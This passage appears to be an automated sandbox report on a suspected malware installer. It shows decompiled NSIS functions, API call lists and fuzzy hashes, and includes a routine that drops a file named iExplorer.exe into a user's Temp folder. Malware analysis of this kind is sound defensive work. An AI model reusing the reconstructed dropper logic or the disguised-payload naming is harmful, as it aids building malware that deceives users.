                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042BC90,00000000,-0000000A,004092F4,00000000,[Rename]), ref: 00405836
                                                                      • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00405848
                                                                      • GlobalFree.KERNEL32 ref: 0040584F
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00405856
                                                                        • Part of subcall function 004055F5: lstrlenA.KERNEL32(?,?,00000000,00000000,0040580B,00000000,[Rename]), ref: 004055FC
                                                                        • Part of subcall function 004055F5: lstrlenA.KERNEL32(?,?,?,00000000,00000000,0040580B,00000000,[Rename]), ref: 0040562C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                                                                      • String ID: %s=%s$KERNEL32.dll$MoveFileExA$[Rename]
                                                                      • API String ID: 3772915668-3759977537
                                                                      • Opcode ID: 7b465b69e4ceb808ad1a35f2f7796c976373172554304188f9f83f7aecf1ccdd
                                                                      • Instruction ID: c457da330c65f7e736f2951005c0eab01e8b3e19eb512715ea7ec2ec436f3c8e
                                                                      • Opcode Fuzzy Hash: 7b465b69e4ceb808ad1a35f2f7796c976373172554304188f9f83f7aecf1ccdd
                                                                      • Instruction Fuzzy Hash: F241E332A00B15BBD7207B619D49F6B3A9CDF45754F14443AFE05F62C2EA7CA8048AAD
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 90%
                                                                      			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42f028;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x42e820, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42f024;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                                                      0x0040100a
                                                                      0x00401039
                                                                      0x00401047
                                                                      0x0040104d
                                                                      0x00401051
                                                                      0x0040105b
                                                                      0x00401061
                                                                      0x00401064
                                                                      0x004010f3
                                                                      0x00401089
                                                                      0x0040108c
                                                                      0x004010a6
                                                                      0x004010bd
                                                                      0x004010cc
                                                                      0x004010cf
                                                                      0x004010d5
                                                                      0x004010d9
                                                                      0x004010e4
                                                                      0x004010ed
                                                                      0x004010ef
                                                                      0x004010ef
                                                                      0x00401100
                                                                      0x00401105
                                                                      0x0040110d
                                                                      0x00401110
                                                                      0x00401112
                                                                      0x00401118
                                                                      0x0040111f
                                                                      0x00401126
                                                                      0x00401130
                                                                      0x00401142
                                                                      0x00401156
                                                                      0x00401160
                                                                      0x00401165
                                                                      0x00401165
                                                                      0x00401110
                                                                      0x0040116e
                                                                      0x00000000
                                                                      0x00401178
                                                                      0x00401010
                                                                      0x00401013
                                                                      0x00401015
                                                                      0x0040101f
                                                                      0x0040101f
                                                                      0x00000000

                                                                      APIs
                                                                      • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                      • GetClientRect.USER32 ref: 0040105B
                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                      • FillRect.USER32 ref: 004010E4
                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                      • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                      • DrawTextA.USER32(00000000,0042E820,000000FF,00000010,00000820), ref: 00401156
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                      • String ID: F
                                                                      • API String ID: 941294808-1304234792
                                                                      • Opcode ID: aeaabe400f50fdb51333509684138e8676dc32cedc9402a7c94534d5e56a624e
                                                                      • Instruction ID: 309bda7df5df2fef83454fedbd0719e2c402cedce3bce7de45e8ac9361e32187
                                                                      • Opcode Fuzzy Hash: aeaabe400f50fdb51333509684138e8676dc32cedc9402a7c94534d5e56a624e
                                                                      • Instruction Fuzzy Hash: E741AA71804249AFCB058FA5CD459BF7FB9FF44314F00802AF951AA1A0C738EA54DFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004059C6, Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 173stringCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 79%
                                                                      			E004059C6(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, char _a11) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				CHAR* _t34;
				signed int _t36;
				signed int _t38;
				long _t51;
				signed int _t53;
				signed int _t61;
				char* _t62;
				char _t66;
				signed int _t68;
				CHAR* _t78;
				signed int _t85;
				void* _t88;

				_t61 = _a8;
				if(_t61 < 0) {
					_t61 =  *( *0x42e7fc - 4 + _t61 * 4);
				}
				_t62 = _t61 +  *0x42f058;
				_t34 = 0x42dfc0;
				_t78 = 0x42dfc0;
				if(_a4 - 0x42dfc0 < 0x800) {
					_t78 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t66 =  *_t62;
					_a11 = _t66;
					if(_t66 == 0) {
						break;
					}
					__eflags = _t78 - _t34 - 0x400;
					if(_t78 - _t34 >= 0x400) {
						break;
					}
					_t62 = _t62 + 1;
					__eflags = _t66 - 0xfc;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t78 = _t66;
							_t78 =  &(_t78[1]);
							__eflags = _t78;
						} else {
							 *_t78 =  *_t62;
							_t78 =  &(_t78[1]);
							_t62 = _t62 + 1;
						}
						continue;
					}
					_t36 =  *((char*)(_t62 + 1));
					_t68 =  *_t62;
					_t85 = (_t36 & 0x0000007f) << 0x00000007 | _t68 & 0x0000007f;
					_v16 = _t36;
					_v12 = _t36 | 0x00008000;
					_t38 = 2;
					_v24 = _t68;
					_t62 = _t62 + _t38;
					__eflags = _a11 - 0xfe;
					_v20 = _t68 | 0x00008000;
					if(_a11 != 0xfe) {
						__eflags = _a11 - 0xfd;
						if(_a11 != 0xfd) {
							__eflags = _a11 - 0xff;
							if(_a11 == 0xff) {
								__eflags = (_t38 | 0xffffffff) - _t85;
								E004059C6(_t62, _t78, _t85, _t78, (_t38 | 0xffffffff) - _t85);
							}
							goto L34;
						}
						__eflags = _t85 - 0x1b;
						if(_t85 != 0x1b) {
							__eflags = (_t85 << 0xa) + 0x430000;
							E004059A4(_t78, (_t85 << 0xa) + 0x430000);
						} else {
							E00405902(_t78,  *0x42f024);
						}
						__eflags = _t85 + 0xffffffeb - 6;
						if(_t85 + 0xffffffeb >= 6) {
							goto L34;
						} else {
							goto L25;
						}
					} else {
						__eflags =  *0x42f0a4;
						_a8 = _t38;
						if( *0x42f0a4 != 0) {
							_a8 = 4;
						}
						do {
							_a8 = _a8 - 1;
							_t51 = SHGetSpecialFolderLocation( *0x42f024,  *(_t88 + _a8 * 4 - 0x14),  &_v8);
							__eflags = _t51;
							if(_t51 != 0) {
								goto L11;
							}
							__imp__SHGetPathFromIDListA(_v8, _t78);
							__imp__CoTaskMemFree(_v8);
							__eflags = _t51;
							if(_t51 != 0) {
								break;
							}
							L11:
							 *_t78 =  *_t78 & 0x00000000;
							__eflags = _a8;
						} while (_a8 != 0);
						__eflags =  *_t78;
						if( *_t78 != 0) {
							L23:
							__eflags = _v16 - 0x1a;
							if(_v16 == 0x1a) {
								lstrcatA(_t78, "\\Microsoft\\Internet Explorer\\Quick Launch");
							}
							L25:
							E00405BD3(_t78);
							L34:
							_t78 =  &(_t78[lstrlenA(_t78)]);
							_t34 = 0x42dfc0;
							continue;
						}
						_t53 = _v24;
						__eflags = _t53 - 0x2b;
						if(_t53 != 0x2b) {
							__eflags = _t53 - 0x26;
							if(_t53 != 0x26) {
								__eflags = _t53 - 0x25;
								if(_t53 != 0x25) {
									__eflags = _t53 - 0x24;
									if(_t53 == 0x24) {
										GetWindowsDirectoryA(_t78, 0x400);
									}
								} else {
									GetSystemDirectoryA(_t78, 0x400);
								}
								L22:
								__eflags =  *_t78;
								if( *_t78 == 0) {
									goto L25;
								}
								goto L23;
							}
							E00405898(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "ProgramFilesDir", _t78);
							__eflags =  *_t78;
							if( *_t78 != 0) {
								goto L23;
							}
							E004059A4(_t78, "C:\\Program Files");
							goto L22;
						}
						E00405898(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "CommonFilesDir", _t78);
						goto L22;
					}
				}
				 *_t78 =  *_t78 & 0x00000000;
				if(_a4 == 0) {
					return _t34;
				}
				return E004059A4(_a4, _t34);
			}




















                                                                      0x004059cd
                                                                      0x004059d4
                                                                      0x004059e5
                                                                      0x004059e5
                                                                      0x004059ef
                                                                      0x004059f1
                                                                      0x004059f8
                                                                      0x00405a00
                                                                      0x00405a06
                                                                      0x00405a09
                                                                      0x00405a09
                                                                      0x00405bad
                                                                      0x00405bad
                                                                      0x00405bb1
                                                                      0x00405bb4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405a16
                                                                      0x00405a1c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405a22
                                                                      0x00405a23
                                                                      0x00405a26
                                                                      0x00405ba0
                                                                      0x00405baa
                                                                      0x00405bac
                                                                      0x00405bac
                                                                      0x00405ba2
                                                                      0x00405ba4
                                                                      0x00405ba6
                                                                      0x00405ba7
                                                                      0x00405ba7
                                                                      0x00000000
                                                                      0x00405ba0
                                                                      0x00405a2c
                                                                      0x00405a30
                                                                      0x00405a40
                                                                      0x00405a47
                                                                      0x00405a4e
                                                                      0x00405a51
                                                                      0x00405a52
                                                                      0x00405a57
                                                                      0x00405a59
                                                                      0x00405a5d
                                                                      0x00405a60
                                                                      0x00405b4b
                                                                      0x00405b4f
                                                                      0x00405b7f
                                                                      0x00405b83
                                                                      0x00405b88
                                                                      0x00405b8c
                                                                      0x00405b8c
                                                                      0x00000000
                                                                      0x00405b83
                                                                      0x00405b51
                                                                      0x00405b54
                                                                      0x00405b69
                                                                      0x00405b70
                                                                      0x00405b56
                                                                      0x00405b5d
                                                                      0x00405b5d
                                                                      0x00405b78
                                                                      0x00405b7b
                                                                      0x00000000
                                                                      0x00405b7d
                                                                      0x00000000
                                                                      0x00405b7d
                                                                      0x00405a66
                                                                      0x00405a66
                                                                      0x00405a6d
                                                                      0x00405a70
                                                                      0x00405a72
                                                                      0x00405a72
                                                                      0x00405a79
                                                                      0x00405a79
                                                                      0x00405a8d
                                                                      0x00405a93
                                                                      0x00405a95
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405a9b
                                                                      0x00405aa6
                                                                      0x00405aac
                                                                      0x00405aae
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405ab0
                                                                      0x00405ab0
                                                                      0x00405ab3
                                                                      0x00405ab3
                                                                      0x00405ab9
                                                                      0x00405abc
                                                                      0x00405b32
                                                                      0x00405b32
                                                                      0x00405b36
                                                                      0x00405b3e
                                                                      0x00405b3e
                                                                      0x00405b43
                                                                      0x00405b44
                                                                      0x00405b91
                                                                      0x00405b97
                                                                      0x00405b99
                                                                      0x00000000
                                                                      0x00405b99
                                                                      0x00405abe
                                                                      0x00405ac1
                                                                      0x00405ac4
                                                                      0x00405add
                                                                      0x00405ae0
                                                                      0x00405b09
                                                                      0x00405b0c
                                                                      0x00405b1c
                                                                      0x00405b1f
                                                                      0x00405b27
                                                                      0x00405b27
                                                                      0x00405b0e
                                                                      0x00405b14
                                                                      0x00405b14
                                                                      0x00405b2d
                                                                      0x00405b2d
                                                                      0x00405b30
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405b30
                                                                      0x00405af2
                                                                      0x00405af7
                                                                      0x00405afa
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405b02
                                                                      0x00000000
                                                                      0x00405b02
                                                                      0x00405ad6
                                                                      0x00000000
                                                                      0x00405ad6
                                                                      0x00405a60
                                                                      0x00405bba
                                                                      0x00405bc4
                                                                      0x00405bd0
                                                                      0x00405bd0
                                                                      0x00000000

                                                                      APIs
                                                                      • SHGetSpecialFolderLocation.SHELL32(00429C60,74B5EA30,00000006,00429C60,00000000,00429C60,00000000), ref: 00405A8D
                                                                      • SHGetPathFromIDListA.SHELL32(74B5EA30,0042DFC0), ref: 00405A9B
                                                                      • CoTaskMemFree.OLE32(74B5EA30), ref: 00405AA6
                                                                      • GetSystemDirectoryA.KERNEL32 ref: 00405B14
                                                                        • Part of subcall function 00405898: RegOpenKeyExA.ADVAPI32(80000002,00405AF7,00000000,00020019,00405AF7,?,00000001,?,00405AF7,80000002,Software\Microsoft\Windows\CurrentVersion,ProgramFilesDir,0042DFC0), ref: 004058B4
                                                                        • Part of subcall function 00405898: RegQueryValueExA.ADVAPI32(00405AF7,?,00000000,80000002,00000001,80000002,?,00405AF7), ref: 004058D5
                                                                        • Part of subcall function 00405898: RegCloseKey.ADVAPI32(00405AF7,?,00405AF7), ref: 004058F6
                                                                        • Part of subcall function 004059A4: lstrcpynA.KERNEL32(?,?,00000400,004031B6,0042E820,NSIS Error), ref: 004059B1
                                                                      • lstrcatA.KERNEL32(0042DFC0,\Microsoft\Internet Explorer\Quick Launch), ref: 00405B3E
                                                                      • lstrlenA.KERNEL32(0042DFC0,00000006,00429C60,00000000,00429C60,00000000,00000000,0041A9FD,74B5EA30), ref: 00405B92
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: CloseDirectoryFolderFreeFromListLocationOpenPathQuerySpecialSystemTaskValuelstrcatlstrcpynlstrlen
                                                                      • String ID: C:\Program Files$CommonFilesDir$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                      • API String ID: 3624987713-2320700955
                                                                      • Opcode ID: f2577ec4d75bdf119fcc4298951d2df559b40930981e5faea5ef9c31dc56e8d5
                                                                      • Instruction ID: cef6d0386ae25b918226feabc47577c78b5e9d4a017e7e4b9bf51ca37024a254
                                                                      • Opcode Fuzzy Hash: f2577ec4d75bdf119fcc4298951d2df559b40930981e5faea5ef9c31dc56e8d5
                                                                      • Instruction Fuzzy Hash: D3512471A04A44AFDF209B648884B7F3BB4DB55324F24823BF955B62D2D23C6942CF5E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004026F7, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 102memoryfilestringCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 33%
                                                                      			E004026F7() {
				void* _t23;
				void* _t29;
				long _t34;
				struct _OVERLAPPED* _t49;
				void* _t52;
				void* _t54;
				void* _t55;
				CHAR* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				 *((intOrPtr*)(_t61 - 0x34)) = 0xfffffd66;
				_t55 = E00402A9D(_t49);
				_t23 = E00405509(_t55);
				_push(_t55);
				if(_t23 == 0) {
					lstrcatA(E0040549D(E004059A4(" C:\Users\hardz\AppData\Local\Temp\iExplorer.exe", "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
					_t56 = 0x409fe8;
				} else {
					_push(0x409fe8);
					E004059A4();
				}
				E00405BD3(_t56);
				E00405661(_t56);
				_t29 = E00405680(_t56, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					_t34 =  *0x42f02c;
					 *(_t61 - 0x2c) = _t34;
					_t54 = GlobalAlloc(0x40, _t34);
					if(_t54 != _t49) {
						E00403112(_t49);
						E004030E0(_t54,  *(_t61 - 0x2c));
						_t59 = GlobalAlloc(0x40,  *(_t61 - 0x1c));
						 *(_t61 - 0x30) = _t59;
						if(_t59 != _t49) {
							_push( *(_t61 - 0x1c));
							_push(_t59);
							_push(_t49);
							_push( *((intOrPtr*)(_t61 - 0x20)));
							E00402EB4();
							while( *_t59 != _t49) {
								_t60 = _t59 + 8;
								 *(_t61 - 0x38) =  *_t59;
								E00405641( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
								_t59 = _t60 +  *(_t61 - 0x38);
							}
							GlobalFree( *(_t61 - 0x30));
						}
						WriteFile( *(_t61 + 8), _t54,  *(_t61 - 0x2c), _t61 - 0x44, _t49);
						GlobalFree(_t54);
						_push(_t49);
						_push(_t49);
						_push( *(_t61 + 8));
						_push(0xffffffff);
						 *((intOrPtr*)(_t61 - 0x34)) = E00402EB4();
					}
					CloseHandle( *(_t61 + 8));
					_t56 = 0x409fe8;
				}
				_t52 = 0xfffffff3;
				if( *((intOrPtr*)(_t61 - 0x34)) < _t49) {
					_t52 = 0xffffffef;
					DeleteFileA(_t56);
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t52);
				E00401428();
				 *0x42f0a8 =  *0x42f0a8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}














                                                                      0x004026f8
                                                                      0x00402704
                                                                      0x00402707
                                                                      0x0040270e
                                                                      0x0040270f
                                                                      0x00402734
                                                                      0x00402739
                                                                      0x00402711
                                                                      0x00402716
                                                                      0x00402717
                                                                      0x00402717
                                                                      0x0040273f
                                                                      0x00402745
                                                                      0x00402752
                                                                      0x0040275a
                                                                      0x0040275d
                                                                      0x00402763
                                                                      0x00402771
                                                                      0x00402776
                                                                      0x0040277a
                                                                      0x0040277d
                                                                      0x00402786
                                                                      0x00402792
                                                                      0x00402796
                                                                      0x00402799
                                                                      0x0040279b
                                                                      0x0040279e
                                                                      0x0040279f
                                                                      0x004027a0
                                                                      0x004027a3
                                                                      0x004027c2
                                                                      0x004027af
                                                                      0x004027b7
                                                                      0x004027ba
                                                                      0x004027bf
                                                                      0x004027bf
                                                                      0x004027c9
                                                                      0x004027c9
                                                                      0x004027db
                                                                      0x004027e2
                                                                      0x004027e8
                                                                      0x004027e9
                                                                      0x004027ea
                                                                      0x004027ed
                                                                      0x004027f4
                                                                      0x004027f4
                                                                      0x004027fa
                                                                      0x00402800
                                                                      0x00402800
                                                                      0x0040280a
                                                                      0x0040280b
                                                                      0x0040280f
                                                                      0x00402811
                                                                      0x00402817
                                                                      0x00402817
                                                                      0x0040281e
                                                                      0x004021e5
                                                                      0x00402935
                                                                      0x00402941

                                                                      APIs
                                                                      • lstrcatA.KERNEL32(00000000,00000000, C:\Users\user\AppData\Local\Temp\iExplorer.exe,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402734
                                                                      • GlobalAlloc.KERNEL32(00000040,?, C:\Users\user\AppData\Local\Temp\iExplorer.exe,40000000,00000002, C:\Users\user\AppData\Local\Temp\iExplorer.exe, C:\Users\user\AppData\Local\Temp\iExplorer.exe,00000000,00000000, C:\Users\user\AppData\Local\Temp\iExplorer.exe,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402774
                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402790
                                                                      • GlobalFree.KERNEL32 ref: 004027C9
                                                                      • WriteFile.KERNEL32(?,00000000,?,?), ref: 004027DB
                                                                      • GlobalFree.KERNEL32 ref: 004027E2
                                                                      • CloseHandle.KERNEL32(?), ref: 004027FA
                                                                      • DeleteFileA.KERNEL32( C:\Users\user\AppData\Local\Temp\iExplorer.exe, C:\Users\user\AppData\Local\Temp\iExplorer.exe,40000000,00000002, C:\Users\user\AppData\Local\Temp\iExplorer.exe, C:\Users\user\AppData\Local\Temp\iExplorer.exe,00000000,00000000, C:\Users\user\AppData\Local\Temp\iExplorer.exe,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402811
                                                                        • Part of subcall function 004059A4: lstrcpynA.KERNEL32(?,?,00000400,004031B6,0042E820,NSIS Error), ref: 004059B1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: Global$AllocFileFree$CloseDeleteHandleWritelstrcatlstrcpyn
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\iExplorer.exe$C:\Users\user\AppData\Local\Temp
                                                                      • API String ID: 3508600917-812238309
                                                                      • Opcode ID: aa18f427e0657756ccdb60b2df1a0131b36aec745ef804db1697e91c00747692
                                                                      • Instruction ID: e6ae9f1591bfa76b9c880210125a6dd4318928060825aafe26ac1f73a67447f5
                                                                      • Opcode Fuzzy Hash: aa18f427e0657756ccdb60b2df1a0131b36aec745ef804db1697e91c00747692
                                                                      • Instruction Fuzzy Hash: 7F31BC71C00515BBCF116FA5CE89DAF7A79EF09324B10823AF914B72D2C67D5D018BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00403E16, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00403E16(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                                      0x00403e28
                                                                      0x00403ebc
                                                                      0x00000000
                                                                      0x00403ebc
                                                                      0x00403e39
                                                                      0x00403e3d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00403e43
                                                                      0x00403e4c
                                                                      0x00403e4f
                                                                      0x00403e4f
                                                                      0x00403e55
                                                                      0x00403e5b
                                                                      0x00403e5b
                                                                      0x00403e67
                                                                      0x00403e6d
                                                                      0x00403e74
                                                                      0x00403e77
                                                                      0x00403e7a
                                                                      0x00403e7c
                                                                      0x00403e7c
                                                                      0x00403e84
                                                                      0x00403e8a
                                                                      0x00403e8a
                                                                      0x00403e94
                                                                      0x00403e99
                                                                      0x00403e9c
                                                                      0x00403ea1
                                                                      0x00403ea4
                                                                      0x00403ea4
                                                                      0x00403eb4
                                                                      0x00403eb4
                                                                      0x00000000

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                      • String ID:
                                                                      • API String ID: 2320649405-0
                                                                      • Opcode ID: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
                                                                      • Instruction ID: 58e12d7a17a48f073ac0dc7c146c3fe23fb5e824e735bfcd0cbd4dbf4bd9f845
                                                                      • Opcode Fuzzy Hash: c97ffb24e4734704427e7b606a740b4fab5c3533c49fee8400ef737fc9d4ca7c
                                                                      • Instruction Fuzzy Hash: EE218471904744ABCB219F78DD08B4B7FFCAF00715B048A69E855E22E0D738EA04CB95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00404D69, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 94%
                                                                      			E00404D69(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42e804;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x40928c; // 0x6
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E004059C6(0, _t39, 0x429c60, 0x429c60, _a4);
					}
					_t26 = lstrlenA(0x429c60);
					_a4 = _t26;
					if(_a8 == 0) {
